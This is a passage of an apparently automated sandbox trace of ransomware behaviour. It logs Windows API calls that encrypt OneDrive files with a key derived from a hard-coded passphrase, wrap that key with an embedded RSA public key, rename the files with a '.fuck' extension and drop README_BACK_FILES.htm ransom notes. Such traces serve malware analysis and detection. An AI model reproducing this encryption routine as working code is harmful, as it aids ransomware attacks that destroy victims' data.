pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.336] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.336] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.336] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.336] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.336] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.336] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.336] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.336] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.336] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.336] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.336] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.336] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.336] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.337] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.337] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.337] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.337] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.337] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.337] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.337] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.337] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.337] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.337] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.337] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.337] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.337] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.338] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.338] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.338] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.338] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.338] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.338] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x1d0, lpOverlapped=0x0) returned 1 [0279.338] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x1d0, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x1e0) returned 1 [0279.338] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x1e0, lpOverlapped=0x0) returned 1 [0279.338] CloseHandle (hObject=0x5d3c) returned 1 [0279.338] CloseHandle (hObject=0x5d48) returned 1 [0279.338] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ko\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ko\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0279.343] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0279.344] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ko\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0279.346] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ko\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ko\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0279.347] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0279.347] CryptDestroyKey (hKey=0x2fb688) returned 1 [0279.347] CryptReleaseContext (hProv=0x2f2d138, dwFlags=0x0) returned 1 [0279.347] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0279.347] FindClose (in: hFindFile=0x2fa748 | out: hFindFile=0x2fa748) returned 1 [0279.347] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ko\\readme_back_files.htm")) returned 0xffffffff [0279.348] AreFileApisANSI () returned 1 [0279.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28892e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0279.348] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ko\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0279.349] GetFileType (hFile=0x5d4c) returned 0x1 [0279.349] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0279.351] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0279.351] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0279.352] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.352] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.352] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0279.354] GetLastError () returned 0x0 [0279.354] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kok\\filesync.localizedresources.dll.mui")) returned 0x20 [0279.355] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0279.356] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kok\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0279.357] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kok\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0279.359] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0279.360] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2ddf8) returned 1 [0279.363] CryptCreateHash (in: hProv=0x2f2ddf8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0279.363] lstrlenA (lpString="gkdJXzAzHsZgjyaYXoQmaXsDzMlQm") returned 29 [0279.363] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb738, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0279.363] CryptDeriveKey (in: hProv=0x2f2ddf8, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0279.363] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0279.363] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0279.363] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2d138) returned 1 [0279.364] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2d138, dwCertEncodingType=0x1, pInfo=0x2f36bb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36be0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36be8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc148) returned 1 [0279.364] CryptEncrypt (in: hKey=0x2fc148, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0279.364] CryptEncrypt (in: hKey=0x2fc148, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2d1c0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2d1c0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0279.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2d1c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2d1c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0279.365] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.377] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.377] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.400] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.401] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.401] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.402] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.402] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.402] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.402] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.402] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.402] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.402] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.402] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.402] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.402] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.403] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.403] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.403] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.403] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.403] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.403] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.403] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.403] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.404] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.404] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, 